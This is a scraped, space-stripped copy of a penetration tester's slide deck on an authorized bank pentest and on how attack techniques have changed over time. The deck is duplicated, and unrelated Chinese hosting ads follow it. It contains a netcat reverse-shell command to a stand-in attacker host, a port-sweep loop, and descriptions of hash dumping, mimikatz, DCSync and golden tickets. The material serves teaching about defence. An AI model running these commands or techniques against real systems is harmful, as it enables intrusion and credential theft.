Supportedpw
pw 时间:2021-02-19 阅读:()
PWNINGBANKSHOWTHEPLAYGROUNDEVOLVEDOVERTHEYEARSByMiikaTurkiaAUTHORMiikaTurkia0751155C83EB3327299EE49D66D0DFA2705BE5DCleadsecurityspecialist@nixuPentestersince'99PAST-PRESENT-FUTUREDISCLAIMER/CONFIDENTIALITYInprinciple,alltheassignmentsarehighlycondentialandcannotbediscussedinpublic(orinprivate)EvenincustomerorganizationonlyafewpeopleknowaboutthetestsorseethereportLuckilyIhaveoneassignmentfromyearsagothatIcandiscusstosomeextentENGAGEMENTAbankwantedpenetrationtestagainsttheirwholeenvironmentInitialtimeallocationwas2weeksThecustomerapparentlywantedtousethereportformarketingpurposesorconvincingtheircustomersAssignmentwasdeemed"completed"afterreportinginitialndingsRULEZTestingoccurredovertheInternetasblackboxtestingNouseraccountsNodocumentationNospeciallimitations,exceptnodisruptiontoservicesNomonetarytransactionsallowedTargetconsistedofaCclassnetworkNETWORKARCHITECTUREFollowingistheassumednetworkarchitecture{Internet}{Internalnetwork}---|FW|||/^^^^^\{DMZ}\__^__/RECONNAISSANCEShoot'emwithallIgotNoneedtostayundertheradarPortscanningQuickscantogetfastresultsThoroughscanonthebackgroundVulnerabilityscanningaftertheinitialportscanINITIALRESULTSThetargetlookedquitechallenging1HTTPSportopenEverythingseemstobeup-to-dateNohighormediumlevelvulnerabilitiesidentiedbyNessusWebapplicationprovidesbasicallyonlyaloginpageNovulnerabilitiesorindicationsofsuchidentiedininitialprobingMOSTPROMISINGNESSUSFINDINGGAININGCODEEXECUTIONLearningtouseMicroSoftFrontPageLearningtowritesomethingusableinVisualBasicScriptMakesuretheVBSisrunonserversideDimshellSetshell=WScript.
CreateObject("WScript.
Shell")shell.
Run""CHALLENGESWITHUPLOADEDBINARIESAttemptingtogaineasieraccessthanuploadingcustomVBSlesUploadnc.
exebinaryResultedinalewithsize0TrysomeotherbinariestoensureeverythingworksSomelesworkperfectlywhileothersendupwithzerosizeGETTINGSHELLDosometrivialmodicationstonc.
exetobypassAVsignaturechecksSuccessStartlistenerlocallytowaitforshellsessionRunthefollowingnetcatcommandusingtheVBScriptdescribedpreviously#iptables-IINPUT-ptcp--dport443-svictim-jACCEPT#nc-nv-l-p443nc.
exeattacker.
example.
org443-ecmd.
exePWDUMPFAMILYMultipleiterationsofsimilarlynamedtoolstodumptheWindowspasswordhashesTheymostlygrabbedthehashesfromSAMdatabase,decryptingthemwithSYSKEYwhenrequiredSupportedWindowsversionsrangefromWindowsNTtoVistaThesetoolshadtoberunontargetmachinewithAdministratorprivilegesSomeofthevariantssupportedobtainingpasswordsoverthenetworkGRABBINGCREDENTIALSDirectdumpofpasswordhashesfromtheSAMdatabasefailedasrunningwithlimitedprivilegesWindowstakesanautomaticcopyofe.
g.
theSAMdatabaseRunningpwdumpagainstthatsucceededgivingmeauserlistalongwiththeirpasswordhashesLANMANHASHEventhoughWindowswasusingNTLMv2hashes,italsostoredLanManhashesbydefaultUsedhashingalgorithmisextremelyfasttocrackMillionsoftestpersecondevenatthattimeLMhashsupports7+7charactersinpasswordsOnlyuppercaseletters,numbersandspecialcharactersEvenAdministratorpasswordwascrackedinnotimePOKINGAROUNDUnderstandingtheenvironmentiscriticalforfurtherattacksWithshellaccess,IwasabletostudythecompromisedhostanditssurroundingsOnlyaccesswithintheDMZ,InternalnetworkwastotallysealedoffLeveragingotherhostswithinDMZdidnotresultinanymorevisibilityoftheinternalnetwork"OLDSTYLEPIVOTING"UsingnetcattoscanafewcommonTCPportstoseeifIhadaccesselsewhereOntopoftheWindows(andHTTPS)protocols,oneIPofferedtelnetaccess,andturnedouttobeaCiscorouterTrivialwayslikedefaultcredentialsorSNMPleakingcongurationsorevenallowingmodicationsdidn'tyfor/l%iin(1,1,254)do(for%pin(21,22,23,25,135,139)donc-nvz127.
0.
0.
%i%p)2>&1|find"open"NETWORKARCHITECTUREUPDATED{Internet}{Internalnetwork}---|FW||/|\{Backend}{DMZ}{Router}LATERALMOVEMENTExcellenttoolcalledpsexecfromSysinternalsisusedtoruncommandsonremoteWindowshostsSupportspass-the-hashandpasswordauthenticationSambalesharestoaccessharddisksNetcatalsopossibleforTCPbasedclear-textservicesINTERNALNETWORKISSOFARAWAYAtthispoint,theDMZwasprettymuchowned,butthegoalwasstillunreachableIreallyneededabreakthroughtogainaccesstotheinternalnetworkGoingthroughthefewavailablehostsanddatawithin,IdiscoveredaterminallogthatseemedinterestingThelogcontainedalltheinputfromtheuserontopofservermessagesAdministrationpasswordfortheInternetrouterCATALYSTAmodularchassisthatcanaccommodatee.
g.
switch,routerandrewallmodulesThechassisranCatOSwhiletheinstalledmodulesranIOSACCESSINGTHEFIREWALLLoggingintotheroutermodulewithtelnetEnableadminfunctionalitywiththeleakedpasswordJumpintoCatOSandfromthereaccessthe"console"ofrewallmoduleCatOSallowsconsoleaccesstoanyinstalledmoduleNormallyadministratorslogdirectlyintotheCatOSinsteadofinstalledmodules,butinthiscasethedirectaccesstoCatOSwasblockedSamepasswordwasusedfortherewall,sonowIhadfullaccesstoitNEWRULETOMASTERTHEMALLAsalltrafcfromtheInternetandDMZtointernalnetworkwasblocked,IhadtochangethegameAddingnewrewallruleforafewchosenTCPportsfrommyIPwasneededWritetherulebutbeextremelycarefultolimitchangestoyourselfonly!
CommitthechangesandgainfastpathtointernalnetworkACCESSINGTHEDOMAINCONTROLLERAquicksweep/enumerationoftheinternalnetworkUseSMBNULLsessiontograbmoreinformationaboutWindowssystemsI.
e.
enumandwinfoRemotedesktopwasenabledontheInternalserverssotryingmyluckwiththecredentialsgrabbedfromDMZEasywinwiththeAdministratoraccountNETWORKARCHITECTUREUPDATEDInternet}|Router{Internalnetwork}---|FW|/\||Windows|+|VMS|+|\DMZ}{Backend}MIDAUDITCHECKPOINTFindingssofarwerecommunicatedtothecustomeronrstweek'sFriday.
(Informationaboutthegapingholeallowingtheinitialcompromisewasgivenimmediatelywhendiscovered.
)IwasplanningtostartpokingaroundtheinternalbankingapplicationsandVMSsystemsonMondayTheassignmentwasdeemedtobecompletedatthispointwhencustomerdigestedthendingssofarPASTVS.
PRESENT-BANKINGSECTORMorebanksareconcernedabouttheirsecurityScopetendstobemorefocused,possiblymissingholesintheadjacentserversorAPIsRedteamingLegislationandprivacyaspectsoftenforceustoignorethesocialengineeringandphishingaspectsofinitialfootholdDependsbetweencountriesTECHNICALMEASURESOTPisnotsolelyreliedonSMSvericationmobileappRiskbasedvalidationsFrauddetectionIsolationofdifferentservicesPVS.
P-OVERALLIngeneralsecurityhasimprovedquitemassivelyindifferentproductsandenvironmentsAfewtoolsremainprettymuchthesamenmapnessusManyoftheattackingtechniquesrelyondesignedfunctionalityandthusdifculttopreventWHYTOCRACKANDWHYNOTCrackingpasswordshasbecomelessnecessaryPass-the-hashPass-the-tokenButPWcrackingisstillusefulFasterthaneverRainbowtablesGPU,multi-core,cloudDetecting/exploitingpasswordreuseRDPandotherprotocolsWINDOWSAPISBasicallyusageofWindowsAPIsisthesameSomenewrestrictionsareputinplaceEvenmoreinterestingavenueshavebeendiscoveredToolsaresomewhatthesamebutbetteroneshavecomealongpsexecstillgoingstrongpwdumphasbeen"replaced"bymimikatzthatdoesthesamebutalsoalotmoreVBScripthasbeenoverrunbyPowerShellEASYORHARD"Hacking"hasbecomealoteasierwithgoodtoolstoautomateandsimplifytasksDefencesandprotectionmechanismsraisethebaralotExperiencesinincidentresponseandforensicsstillshowthesametricksbeingusedconstantlyinpresentdayMoststupidmistakesareexploitedHighlyadvancedattacksarealsobeingusedPVS.
P-DUMPINGPASSWORDHASHESToolsandtechniqueshaveevolvedquiteabitmimikatzGrabscleartextpasswords,hashesandkerberosticketsfrommemoryCanperformpass-the-hash,pass-the-ticket,buildgoldenticket,.
.
.
RuntoolsdirectlyfrommemorytoavoidAVdetectionPENETRATIONTESTINGFRAMEWORKSIntegratealotofreliableexploitsandfunctionalityPrettymuchallofthemsupportgrabbingpasswords(hashesandcleartext)OftenusingmimikatzNotonlycredentialsaregrabbedbutalsousedautomaticallyforlateralmovementGRABBINGTHEHASHESONWINDOWSDOMAINThereareafewwaystograbhasheswhenhavingenoughprivilegesonaWindowsDomainRequiredgroup:Administrators(includingDomainandEnterprise),orDomainControllercomputeraccountDCSyncisthemostnotablemethodcurrentlyAcomputerimpersonatesasadomaincontrollerandasksthevictimDCtoreplicateusercredentialsGOLDENTICKETGeneratearbitraryKerberosTGTticketsforanyuserofthetargetdomainCanbecreatedoff-lineKerberoslifetimepolicydoesnotaffectgoldenticketsCanbeusedwithpass-the-ticketmethodtoaccessanyresourceorimpersonateasanydomainuserPVS.
P-ANTI-VIRUSAntivirussoftwarehasevolvedfrompuresignaturebasedtouseheuristicsSandboxingisusedinanalysisandcontainmentAVcanstillbebypassedSlightmodicationsonbinariesTechniquestoescapesandboxhavebeendescribedovertheyearsLoadingmaliciousPowerShellfromnetworkandexecutingdirectlyinmemoryATT&CKAdversarialTactics,Techniques,andCommonKnowledge(ATT&CK)Goodinformationaboutthetecniquesandexampleswhenusede.
g.
byATPgroupshttps://attack.
mitre.
org/wiki/Main_PagePVS.
P-DETECTIONWindowsloggingstill(mostly)sucksbydefaultNopropervisibilityonwhat'shappeningonservers/workstationsDefaultlogretentionperiodsaretoosmallLogsarenotforwardedtoremotemachineLoganalysis/correlationislackingImportanteventsordetailsarenotloggedPlentyofirrelevantnoisetoclutterupthelogsandshortentheretention"period"(inMB)FUTURE
CreateObject("WScript.
Shell")shell.
Run""CHALLENGESWITHUPLOADEDBINARIESAttemptingtogaineasieraccessthanuploadingcustomVBSlesUploadnc.
exebinaryResultedinalewithsize0TrysomeotherbinariestoensureeverythingworksSomelesworkperfectlywhileothersendupwithzerosizeGETTINGSHELLDosometrivialmodicationstonc.
exetobypassAVsignaturechecksSuccessStartlistenerlocallytowaitforshellsessionRunthefollowingnetcatcommandusingtheVBScriptdescribedpreviously#iptables-IINPUT-ptcp--dport443-svictim-jACCEPT#nc-nv-l-p443nc.
exeattacker.
example.
org443-ecmd.
exePWDUMPFAMILYMultipleiterationsofsimilarlynamedtoolstodumptheWindowspasswordhashesTheymostlygrabbedthehashesfromSAMdatabase,decryptingthemwithSYSKEYwhenrequiredSupportedWindowsversionsrangefromWindowsNTtoVistaThesetoolshadtoberunontargetmachinewithAdministratorprivilegesSomeofthevariantssupportedobtainingpasswordsoverthenetworkGRABBINGCREDENTIALSDirectdumpofpasswordhashesfromtheSAMdatabasefailedasrunningwithlimitedprivilegesWindowstakesanautomaticcopyofe.
g.
theSAMdatabaseRunningpwdumpagainstthatsucceededgivingmeauserlistalongwiththeirpasswordhashesLANMANHASHEventhoughWindowswasusingNTLMv2hashes,italsostoredLanManhashesbydefaultUsedhashingalgorithmisextremelyfasttocrackMillionsoftestpersecondevenatthattimeLMhashsupports7+7charactersinpasswordsOnlyuppercaseletters,numbersandspecialcharactersEvenAdministratorpasswordwascrackedinnotimePOKINGAROUNDUnderstandingtheenvironmentiscriticalforfurtherattacksWithshellaccess,IwasabletostudythecompromisedhostanditssurroundingsOnlyaccesswithintheDMZ,InternalnetworkwastotallysealedoffLeveragingotherhostswithinDMZdidnotresultinanymorevisibilityoftheinternalnetwork"OLDSTYLEPIVOTING"UsingnetcattoscanafewcommonTCPportstoseeifIhadaccesselsewhereOntopoftheWindows(andHTTPS)protocols,oneIPofferedtelnetaccess,andturnedouttobeaCiscorouterTrivialwayslikedefaultcredentialsorSNMPleakingcongurationsorevenallowingmodicationsdidn'tyfor/l%iin(1,1,254)do(for%pin(21,22,23,25,135,139)donc-nvz127.
0.
0.
%i%p)2>&1|find"open"NETWORKARCHITECTUREUPDATED{Internet}{Internalnetwork}---|FW||/|\{Backend}{DMZ}{Router}LATERALMOVEMENTExcellenttoolcalledpsexecfromSysinternalsisusedtoruncommandsonremoteWindowshostsSupportspass-the-hashandpasswordauthenticationSambalesharestoaccessharddisksNetcatalsopossibleforTCPbasedclear-textservicesINTERNALNETWORKISSOFARAWAYAtthispoint,theDMZwasprettymuchowned,butthegoalwasstillunreachableIreallyneededabreakthroughtogainaccesstotheinternalnetworkGoingthroughthefewavailablehostsanddatawithin,IdiscoveredaterminallogthatseemedinterestingThelogcontainedalltheinputfromtheuserontopofservermessagesAdministrationpasswordfortheInternetrouterCATALYSTAmodularchassisthatcanaccommodatee.
g.
switch,routerandrewallmodulesThechassisranCatOSwhiletheinstalledmodulesranIOSACCESSINGTHEFIREWALLLoggingintotheroutermodulewithtelnetEnableadminfunctionalitywiththeleakedpasswordJumpintoCatOSandfromthereaccessthe"console"ofrewallmoduleCatOSallowsconsoleaccesstoanyinstalledmoduleNormallyadministratorslogdirectlyintotheCatOSinsteadofinstalledmodules,butinthiscasethedirectaccesstoCatOSwasblockedSamepasswordwasusedfortherewall,sonowIhadfullaccesstoitNEWRULETOMASTERTHEMALLAsalltrafcfromtheInternetandDMZtointernalnetworkwasblocked,IhadtochangethegameAddingnewrewallruleforafewchosenTCPportsfrommyIPwasneededWritetherulebutbeextremelycarefultolimitchangestoyourselfonly!
CommitthechangesandgainfastpathtointernalnetworkACCESSINGTHEDOMAINCONTROLLERAquicksweep/enumerationoftheinternalnetworkUseSMBNULLsessiontograbmoreinformationaboutWindowssystemsI.
e.
enumandwinfoRemotedesktopwasenabledontheInternalserverssotryingmyluckwiththecredentialsgrabbedfromDMZEasywinwiththeAdministratoraccountNETWORKARCHITECTUREUPDATEDInternet}|Router{Internalnetwork}---|FW|/\||Windows|+|VMS|+|\DMZ}{Backend}MIDAUDITCHECKPOINTFindingssofarwerecommunicatedtothecustomeronrstweek'sFriday.
(Informationaboutthegapingholeallowingtheinitialcompromisewasgivenimmediatelywhendiscovered.
)IwasplanningtostartpokingaroundtheinternalbankingapplicationsandVMSsystemsonMondayTheassignmentwasdeemedtobecompletedatthispointwhencustomerdigestedthendingssofarPASTVS.
PRESENT-BANKINGSECTORMorebanksareconcernedabouttheirsecurityScopetendstobemorefocused,possiblymissingholesintheadjacentserversorAPIsRedteamingLegislationandprivacyaspectsoftenforceustoignorethesocialengineeringandphishingaspectsofinitialfootholdDependsbetweencountriesTECHNICALMEASURESOTPisnotsolelyreliedonSMSvericationmobileappRiskbasedvalidationsFrauddetectionIsolationofdifferentservicesPVS.
P-OVERALLIngeneralsecurityhasimprovedquitemassivelyindifferentproductsandenvironmentsAfewtoolsremainprettymuchthesamenmapnessusManyoftheattackingtechniquesrelyondesignedfunctionalityandthusdifculttopreventWHYTOCRACKANDWHYNOTCrackingpasswordshasbecomelessnecessaryPass-the-hashPass-the-tokenButPWcrackingisstillusefulFasterthaneverRainbowtablesGPU,multi-core,cloudDetecting/exploitingpasswordreuseRDPandotherprotocolsWINDOWSAPISBasicallyusageofWindowsAPIsisthesameSomenewrestrictionsareputinplaceEvenmoreinterestingavenueshavebeendiscoveredToolsaresomewhatthesamebutbetteroneshavecomealongpsexecstillgoingstrongpwdumphasbeen"replaced"bymimikatzthatdoesthesamebutalsoalotmoreVBScripthasbeenoverrunbyPowerShellEASYORHARD"Hacking"hasbecomealoteasierwithgoodtoolstoautomateandsimplifytasksDefencesandprotectionmechanismsraisethebaralotExperiencesinincidentresponseandforensicsstillshowthesametricksbeingusedconstantlyinpresentdayMoststupidmistakesareexploitedHighlyadvancedattacksarealsobeingusedPVS.
P-DUMPINGPASSWORDHASHESToolsandtechniqueshaveevolvedquiteabitmimikatzGrabscleartextpasswords,hashesandkerberosticketsfrommemoryCanperformpass-the-hash,pass-the-ticket,buildgoldenticket,.
.
.
RuntoolsdirectlyfrommemorytoavoidAVdetectionPENETRATIONTESTINGFRAMEWORKSIntegratealotofreliableexploitsandfunctionalityPrettymuchallofthemsupportgrabbingpasswords(hashesandcleartext)OftenusingmimikatzNotonlycredentialsaregrabbedbutalsousedautomaticallyforlateralmovementGRABBINGTHEHASHESONWINDOWSDOMAINThereareafewwaystograbhasheswhenhavingenoughprivilegesonaWindowsDomainRequiredgroup:Administrators(includingDomainandEnterprise),orDomainControllercomputeraccountDCSyncisthemostnotablemethodcurrentlyAcomputerimpersonatesasadomaincontrollerandasksthevictimDCtoreplicateusercredentialsGOLDENTICKETGeneratearbitraryKerberosTGTticketsforanyuserofthetargetdomainCanbecreatedoff-lineKerberoslifetimepolicydoesnotaffectgoldenticketsCanbeusedwithpass-the-ticketmethodtoaccessanyresourceorimpersonateasanydomainuserPVS.
P-ANTI-VIRUSAntivirussoftwarehasevolvedfrompuresignaturebasedtouseheuristicsSandboxingisusedinanalysisandcontainmentAVcanstillbebypassedSlightmodicationsonbinariesTechniquestoescapesandboxhavebeendescribedovertheyearsLoadingmaliciousPowerShellfromnetworkandexecutingdirectlyinmemoryATT&CKAdversarialTactics,Techniques,andCommonKnowledge(ATT&CK)Goodinformationaboutthetecniquesandexampleswhenusede.
g.
byATPgroupshttps://attack.
mitre.
org/wiki/Main_PagePVS.
P-DETECTIONWindowsloggingstill(mostly)sucksbydefaultNopropervisibilityonwhat'shappeningonservers/workstationsDefaultlogretentionperiodsaretoosmallLogsarenotforwardedtoremotemachineLoganalysis/correlationislackingImportanteventsordetailsarenotloggedPlentyofirrelevantnoisetoclutterupthelogsandshortentheretention"period"(inMB)FUTURE
wordpress外贸企业主题 wordpress高级全行业大气外贸主题
wordpress高级全行业大气外贸主题,wordpress通用全行业高级外贸企业在线询单自适应主题建站程序,完善的外贸企业建站功能模块 + 高效通用的后台自定义设置,更实用的移动设备特色功能模块 + 更适于欧美国外用户操作体验 大气简洁的网站风格设计 + 高效优化的网站程序结构,更利于Goolge等SEO搜索优化和站点收录排名。点击进入:wordpress高级全行业大气外贸主题主题价格:¥398...
棉花云1折起(49元), 国内BGP 美国 香港 日本
棉花云官网棉花云隶属于江西乐网科技有限公司,前身是2014年就运营的2014IDC,专注海外线路已有7年有余,是国内较早从事海外专线的互联网基础服务提供商。公司专注为用户提供低价高性能云计算产品,致力于云计算应用的易用性开发,并引导云计算在国内普及。目前公司研发以及运营云服务基础设施服务平台(IaaS),面向全球客户提供基于云计算的IT解决方案与客户服务(SaaS),拥有丰富的国内BGP、双线高防...
提速啦(69元起)香港大带宽CN2+BGP独享云服务器
香港大带宽服务器香港大带宽云服务器目前市场上可以选择的商家十分少,这次给大家推荐的是我们的老便宜提速啦的香港大带宽云服务器,默认通用BGP线路(即CN2+BGP)是由三网直连线路 中国电信骨干网以及HGC、NTT、PCCW等国际线路混合而成的高品质带宽(精品带宽)线路,可有效覆盖全球200多个国家和地区。(适用于绝大部分应用场景,适合国内外访客访问,域名无需备案)提速啦官网链接:点击进入香港Cer...
pw为你推荐
-
万网核心代理哪里可以注册免费代理?1433端口怎么开启本机1433端口显卡温度多少正常显卡温度多少正常ps抠图技巧ps抠图多种技巧,越详细越好,急~~~~~~~ps抠图技巧photoshop最基本的抠图方法和技巧!godaddy通过什么网址可以查godaddy的域名信息安装迅雷看看播放器迅雷看看不能播放,说我尚未安装迅雷看看播放器bt封杀北京禁用BT下载,是真的吗?为什么?安全漏洞如何发现系统安全漏洞网络广告投放怎样在网络上进行广告的投放?